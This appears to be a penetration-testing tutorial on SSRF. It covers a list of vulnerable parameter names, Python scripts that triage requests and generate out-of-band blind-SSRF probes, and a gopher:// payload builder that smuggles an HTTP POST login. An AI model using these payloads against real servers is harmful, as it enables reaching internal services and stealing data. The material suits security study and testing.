SSRF

Server-Side Request Forgery (SSRF) is a web security vulnerability that lets an attacker make the server-side application issue requests to a destination the attacker chooses. Because the request originates from the server, it can reach hosts the attacker cannot reach directly, such as internal services, cloud metadata endpoints or the loopback interface.

Tools & Resources


Finding SSRF Vectors

If you are facing a blind SSRF (no response content is reflected back to you), use Burp Collaborator, interact.sh or a similar out-of-band service to obtain a DNS or HTTP callback. If the target validates your input, check out the PortSwigger Bypass CheatSheet for filter-evasion techniques.

To identify potential SSRF vectors, look for GET or POST parameters the application uses to reach other resources, whether explicitly (the value is itself a URL) or implicitly (a hostname, path, port or identifier that the server turns into a request).

The OWASP top 25 vulnerable parameters list, as of the time of writing, contains:

?dest={target}
?redirect={target}
?uri={target}
?path={target}
?continue={target}
?url={target}
?window={target}
?next={target}
?data={target}
?reference={target}
?site={target}
?html={target}
?val={target}
?validate={target}
?domain={target}
?callback={target}
?return={target}
?page={target}
?feed={target}
?host={target}
?port={target}
?to={target}
?out={target}
?view={target}
?dir={target}
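As an added example (not code from the original page), the script below triages captured requests for SSRF candidates. It uses the parameter list above as one signal but goes beyond it: the shape of the value (a full URL, a bare host or IP, a path) is weighted more heavily than the name, since an unlisted parameter such as image=https://... is a stronger lead than a listed one such as page=3. The sample requests and the out-of-band hostname are constructed for illustration.

```python
"""Triage captured requests for SSRF candidates.

Added example, not code from the original page. SUSPECT_PARAMS is the page's
parameter list; the value-shape heuristic and the sample requests below are
constructed here for illustration, as is the out-of-band hostname.
"""
import ipaddress
import re
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

SUSPECT_PARAMS = {
    "dest", "redirect", "uri", "path", "continue", "url", "window", "next",
    "data", "reference", "site", "html", "val", "validate", "domain",
    "callback", "return", "page", "feed", "host", "port", "to", "out",
    "view", "dir",
}

_SCHEME = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.I)
_HOSTNAME = re.compile(r"^(?:[a-z0-9\-]+\.)+[a-z]{2,}(?::\d{1,5})?$", re.I)
_PORT_SUFFIX = re.compile(r":\d{1,5}$")

# Weight of each value shape: a value that already is a URL is the strongest
# signal, a bare host or IP next, a path-like value weakest.
SHAPE_WEIGHT = {"url": 3, "host": 2, "ip": 2, "path": 1, "opaque": 0}


def value_shape(value: str) -> str:
    """Classify a parameter value by how much it looks like a fetch target."""
    v = value.strip()
    if _SCHEME.match(v):
        return "url"
    # Try the raw value first (handles IPv6 like ::1), then with a :port removed.
    for cand in (v, _PORT_SUFFIX.sub("", v)):
        try:
            ipaddress.ip_address(cand)
            return "ip"
        except ValueError:
            pass
    if _HOSTNAME.match(v):
        return "host"
    if v.startswith("/") or v.startswith("../"):
        return "path"
    return "opaque"


def triage_request(method: str, url: str, body: str = "") -> list:
    """Return [(name, value, score, shape, name_matches)] sorted by score, desc.

    Score = shape weight + 1 if the name is on the suspect list. Parameters that
    score 0 (opaque value, unremarkable name) are dropped.
    """
    params = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    if method.upper() == "POST" and body:
        params += parse_qsl(body, keep_blank_values=True)
    findings = []
    for name, value in params:
        shape = value_shape(value)
        named = name.lower() in SUSPECT_PARAMS
        score = SHAPE_WEIGHT[shape] + (1 if named else 0)
        if score:
            findings.append((name, value, score, shape, named))
    return sorted(findings, key=lambda f: -f[2])


def pingback_payloads(url: str, name: str, oob_host: str) -> list:
    """Rewrite query parameter `name` with blind-SSRF probes aimed at an
    out-of-band listener (a Burp Collaborator / interact.sh style hostname).

    Three variants: a full URL, a scheme-relative URL (for sinks that prepend
    their own scheme), and a bare host (for host/domain-style parameters).
    """
    parts = urlsplit(url)
    params = parse_qsl(parts.query, keep_blank_values=True)
    probes = [f"http://{oob_host}/", f"//{oob_host}/", oob_host]
    payloads = []
    for probe in probes:
        query = urlencode([(n, probe if n == name else v) for n, v in params])
        payloads.append(urlunsplit(parts._replace(query=query)))
    return payloads


if __name__ == "__main__":
    # Constructed sample traffic, not real captures.
    samples = [
        ("GET", "https://app.example/fetch?url=http://cdn.example/a.png&page=3", ""),
        ("POST", "https://app.example/preview", "image=https://img.example/x.jpg&title=hello"),
        ("GET", "https://app.example/api?host=169.254.169.254:80&format=json", ""),
    ]
    for method, url, body in samples:
        for name, value, score, shape, named in triage_request(method, url, body):
            print(f"{method} {url} -> {name}={value!r} score={score} ({shape}, listed={named})")
    for p in pingback_payloads(samples[0][1], "url", "abc123.oast.example"):
        print(p)
```

Feed it the URLs and bodies from a proxy history export and probe the highest-scoring parameters first; the bare-host probe is the one to use for host= or domain= style parameters where the application adds its own scheme.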

Using Gopher to send POST data

There is no way to send a POST request with the http URL scheme: a plain http:// URL only lets you pick the destination, while the server's HTTP client decides the method (normally GET), headers and body. The gopher URL scheme instead sends an arbitrary byte string to a TCP socket, so you can write the whole HTTP request yourself, POST body included. This only works if the server-side client supports gopher (libcurl-based clients such as PHP's curl extension typically do; many other HTTP libraries do not).

Suppose you want to send a POST request to login.php with username sfoffo and password admin. Write out the raw HTTP request first, then URL-encode every special character to obtain a valid gopher URL: spaces become %20, each line break (CRLF) becomes %0D%0A, and the = and & in the form body become %3D and %26. Content-Length must equal the byte length of the body; username=sfoffo&password=admin is 30 bytes, and a wrong value makes the server either truncate the form data or wait for bytes that never arrive.

After that, prefix the encoded request with the gopher scheme, the target host and port, a slash and an underscore. The character after the slash is the gopher item type, which the client strips before sending the rest of the selector (followed by CRLF) to the socket, so the underscore is only a placeholder. The result is the following gopher URL:

gopher://example.sfoffo:80/_POST%20/login.php%20HTTP%2F1.1%0D%0AHost:%20example.sfoffo%0D%0AContent-Length:%2030%0D%0AContent-Type:%20application/x-www-form-urlencoded%0D%0A%0D%0Ausername%3Dsfoffo%26password%3Dadmin

Two practical notes. If the gopher URL is passed as the value of a query parameter (for example ?url=gopher://...), URL-encode it a second time, otherwise the application's own parameter parser consumes the %, = and & that belong to the smuggled request. And because gopher has no message framing, the client reads until the server closes the connection; adding a Connection: close header avoids waiting for the HTTP keep-alive timeout.
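The following added example (my code, not the page's) builds the gopher URL programmatically from a path and a form dictionary, reconstructs the bytes a gopher client would put on the wire, and checks that Content-Length matches the body. It reuses the page's example.sfoffo host and sfoffo/admin credentials; the Connection: close header and the query-string re-encoding helper are additions, and nothing here touches the network.

```python
"""Build, decode and sanity-check a gopher:// SSRF payload carrying an HTTP POST.

Added example (not code from the original page). Host, path and credentials
reuse the page's illustrative values (example.sfoffo, login.php, sfoffo/admin);
nothing here talks to the network.
"""
from urllib.parse import quote, unquote_to_bytes, urlencode


def build_gopher_post(host: str, port: int, path: str, form: dict) -> str:
    """Return a gopher URL whose selector is a complete HTTP/1.1 POST request.

    Content-Length is computed from the encoded body, so header and body cannot
    disagree. Connection: close makes the HTTP server hang up after replying;
    gopher has no framing, so the client otherwise waits for the keep-alive timeout.
    """
    body = urlencode(form)  # application/x-www-form-urlencoded, e.g. a=1&b=2
    request = (
        f"POST {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Content-Length: {len(body.encode('ascii'))}\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        "Connection: close\r\n"
        "\r\n"
        f"{body}"
    )
    # Percent-encode everything except '/' and ':' so spaces become %20, CRLF
    # becomes %0D%0A and the body's '=' and '&' become %3D and %26.
    selector = quote(request, safe="/:")
    # The character right after the slash is the gopher item type; the client
    # strips it and sends the remainder. An underscore is the usual placeholder.
    return f"gopher://{host}:{port}/_{selector}"


def gopher_wire_bytes(url: str) -> bytes:
    """Reconstruct what a gopher client writes to the TCP socket for this URL.

    Mirrors the protocol rule: drop the one-character item type, percent-decode
    the selector, and terminate it with CRLF.
    """
    if not url.startswith("gopher://"):
        raise ValueError("not a gopher URL")
    _hostport, _, type_and_selector = url[len("gopher://"):].partition("/")
    return unquote_to_bytes(type_and_selector[1:]) + b"\r\n"


def content_length_matches(wire: bytes) -> bool:
    """True if the declared Content-Length equals the body the server will read.

    Too small and the server truncates the form data; too large and it blocks
    waiting for bytes that never come. The CRLF the gopher client appends after
    the selector is not part of the body and is ignored here.
    """
    head, sep, body = wire.partition(b"\r\n\r\n")
    if not sep:
        return False
    declared = None
    for line in head.split(b"\r\n")[1:]:
        name, _, value = line.partition(b":")
        if name.strip().lower() == b"content-length":
            declared = int(value.strip())
    if body.endswith(b"\r\n"):
        body = body[:-2]
    return declared is not None and declared == len(body)


def embed_in_query(gopher_url: str) -> str:
    """Encode the gopher URL once more for use as a query-string value (?url=...).

    Without this second layer the application's own parameter parser consumes
    the '%', '=' and '&' that belong to the smuggled request.
    """
    return quote(gopher_url, safe="")


if __name__ == "__main__":
    url = build_gopher_post("example.sfoffo", 80, "/login.php",
                            {"username": "sfoffo", "password": "admin"})
    print(url)
    wire = gopher_wire_bytes(url)
    print(wire.decode())
    print("Content-Length consistent:", content_length_matches(wire))
    print("?url=" + embed_in_query(url))
```

Running gopher_wire_bytes on a hand-written payload before firing it is a cheap way to catch the two mistakes that silently break gopher SSRF: a Content-Length that does not match the body, and a missing percent-encoding layer when the URL is embedded in a query string.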